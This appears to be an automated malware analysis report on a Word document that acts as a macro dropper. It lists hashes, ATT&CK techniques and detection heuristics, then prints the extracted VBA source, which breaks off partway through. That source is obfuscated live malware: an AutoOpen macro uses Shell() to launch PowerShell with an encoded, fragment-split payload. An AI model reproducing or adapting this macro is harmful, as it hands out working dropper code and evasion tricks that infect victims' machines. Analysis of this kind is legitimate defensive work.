Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6eb19a26ba45626c…

MALICIOUS

Office (OLE)

Size: 105.0 KB
Created: 2018-06-12 22:34:00
Authoring application: Microsoft Office Word
First seen: 2019-09-30
MD5: 9b26a8d4842e1c18590638287d3477c3
SHA-1: bbe06fc2965ff311777e0df99adf535991ad1f3c
SHA-256: 6eb19a26ba45626c76cfacc8cedf3fcfc541ceb966634cea37a31d39306a0fe2
Risk Score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1204.002 User Execution: Malicious File

The sample is a malicious Office document containing a VBA macro. The Autoopen subroutine triggers the zjjcP function, which uses the Shell() function to execute a command. This indicates the document is a dropper designed to download and execute a second-stage payload.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6582963-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6582963-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 13296 bytes
SHA-256: cf099ee166fda3c8bfb0f2c14123ad435271756ea106ac1e3e18914b5a65a8fe
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "DZzrbsQJfAGaL"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function zjjcP()
On Error Resume Next
ViDnv = Tan(4638)
DZwNh = EOqHQ
MXGNSB = CDbl(sNizbv)
VGGMf = lXKNXY
jEkbK = Hex(nwzORl * ChrW(BKwYaX + Int(JzzHi * Rnd(54645)) * JpNsp * Log(89804 * KncCop - aYrpb + Fix(51))))
wbYlnA = Tan(12639)
mGczh = Tan(40728)
JjVbqH = WVWlhJ
YGSDjS = CDbl(QbFpoR)
jzEHU = RoVOkm
FDPBS = Hex(iOAKuw * ChrW(vsHPm + Int(qSpVR * Rnd(58918)) * fRjkE * Log(35683 * LcMMEW - mJjpKI + Fix(51))))
iYjGb = Tan(66417)
zjjcP = bcJcbQBV + Shell(sMNWUiVWP + Chr(YYwVShGMr + vbKeyP + INXoDzCi) + "owers" + YDcGmFaCGBa + JHupjV + MvtLHpW + mQhhjK + EWPpXOzqX + TKDFE, 20091 - 20091)
oPhzWF = Tan(34540)
iPGbB = SfvLPL
IJjGW = CDbl(wsCick)
WNfOi = ZYfQi
GaQslu = Hex(XrjGB * ChrW(AJVUbl + Int(rAUFAj * Rnd(55784)) * lfdszX * Log(30521 * fzQjP - JqGdX + Fix(51))))
IDDDfE = Tan(83481)
End Function
Sub Autoopen()
On Error Resume Next
GKsFR = Tan(27567)
MCNDUk = pUKBOf
iwWIvp = CDbl(bZNtfK)
VHLRB = zntZDz
Nisdp = Hex(OcMVw * ChrW(YCkdz + Int(oaYUN * Rnd(98929)) * NDtqEw * Log(11372 * UVtjjD - vmIlO + Fix(51))))
cYNKtP = Tan(28548)
zjjcP
vsVtt = Tan(54951)
UlHYq = DhrwQ
UimMb = CDbl(okfjjL)
raZcXn = aLbBBM
WYqWN = Hex(HusJjt * ChrW(FscoE + Int(rzwiET * Rnd(17543)) * jJDkKO * Log(24231 * LoKTh - wiPwd + Fix(51))))
kiimwF = Tan(41636)
End Sub


Attribute VB_Name = "YulDEDbkoZ"
Function YDcGmFaCGBa()
On Error Resume Next
JkGrf = Tan(34909)
Xaffq = rABKI
YHitZE = CDbl(wFZwj)
LuqZN = rXijua
AJbiMc = Hex(tHMfqh * ChrW(PTwzdv + Int(fiAao * Rnd(23369)) * RpXkS * Log(81486 * FXbNT - SDhLjj + Fix(51))))
bDklQ = Tan(59349)
VWzAKpQI = "HeLL" + " -e KAAgA" + "E4AZQ" + "B3AC0ATwBiAE" + "oARQBjA"
VfaDY = Tan(32168)
cSovX = jKwWkK
BbzprH = CDbl(pNEmU)
bhazXo = fqksP
pcRHN = Hex(FhOuh * ChrW(MQQiON + Int(bjPBj * Rnd(98495)) * vHSLqE * Log(49173 * SXXGqk - GNnsM + Fix(51))))
YmAbW = Tan(80475)
AlUGMzd = "FQAIAB" + "pAG8ALgBDAG8ATQ" + "BwAHI" + "AZ" + "QBTAHMAaQ" + "Bv" + "AG4ALgBEAEUAZg" + "Bs" + "AGEAdABFAFMA"
cZaiIO = Tan(11060)
PCDdLj = sGHWSM
COrnnW = CDbl(RjTOk)
tzpwc = QrKkPA
butTAX = Hex(zWMrUb * ChrW(dzTjOa + Int(EvRJun * Rnd(93424)) * sdbmIv * Log(51755 * PTrJE - kwdAv + Fix(51))))
tqABaB = Tan(43467)
iHjQNP = "dABS" + "AEUAQQBN" + "ACgAIABbAFMAe" + "QBzAFQARQ" + "BNAC4ASQ" + "BvAC4ATQBlAG0"
cKFkfN = Tan(58368)
PiSnCa = PWQYi
TfurJ = CDbl(BdZLHZ)
vEOGir = BiuhIl
mkiJc = Hex(oJfLtV * ChrW(cFpWL + Int(afzBQ * Rnd(74477)) * qIkkMi * Log(46166 * OsvCf - nmZDNI + Fix(51))))
PwsXW = Tan(89645)
PBoHNAvk = "ATwBSAHkAcwBUAH" + "IARQB" + "BAE0AXQ" + "AgAFsAUwBZAHMA" + "VABlAG" + "0ALgBjAG8Abg"
YDcGmFaCGBa = VWzAKpQI + AlUGMzd + iHjQNP + PBoHNAvk
End Function
Function JHupjV()
On Error Resume Next
onjOW = Tan(89341)
fYuwKz = NMuUjd
sazCiL = CDbl(MrMpnM)
bJjfkm = NiECK
BjwDq = Hex(YvNlL * ChrW(iWSjiJ + Int(kMmCN * Rnd(79419)) * qifvtA * Log(37884 * ZctJzW - oNYUmC + Fix(51))))
pjwvf = Tan(49513)
obWpj = "BW" + "AGUAcgB0AF0A" + "OgA6AGYA" + "cg" + "BPAG0AQgBhAFMAR" + "QA2" + "ADQAcwBUA" + "FIA" + "aQ"
PhkNv = Tan(51524)
QRsLYw = qnZKAw
YitCt = CDbl(pwzzUt)
KvIvD = uYvjJO
TztXl = Hex(dpqCrL * ChrW(AERSu + Int(iWmuid * Rnd(12211)) * Bwcwj * Log(77271 * HqFcMp - jUsRj + Fix(51))))
vqHdm = Tan(35436)
PjzZwH = "BOAGcAKAAgAC" + "cAVgBa" + "AEIAU" + "gBU" + "ADgA" + "SQB3AEYASQBY"
jjEOtf = Tan(51048)
rNEHXO = OMpiBO
SBNtEJ = CDbl(rzMRE)
alqjh = orGoJ
mCbvn = Hex(RUvOC * ChrW(zaRQA + Int(sqSLS * Rnd(55524)) * GAmaw * Log(22362 * DhRHj - LIAjIM + Fix(51))))
pjGzXr = Tan(84632)
MdHFRPT = "AC8AU" + "wBo" + "ACsAV" + "wBqAEUA" + "WABYA" + "FIAVABRA"
TtbjwZ = Tan(64278)
fuzCp = SIKhED
piCGtf = CDbl(uoCET)
jnpXk = dFVpJ
tsRzn = Hex(moLdLZ * ChrW(FtKIqs + Int(jXNiSm * Rnd(94401)) * ZfUttw * Log(99919 * FwAMRf - GcQtf + Fix(51))))
TwiwOa = Tan(43649)
oaOLYi = "GgAcw" + "BwAGcAZwBLA
... (truncated)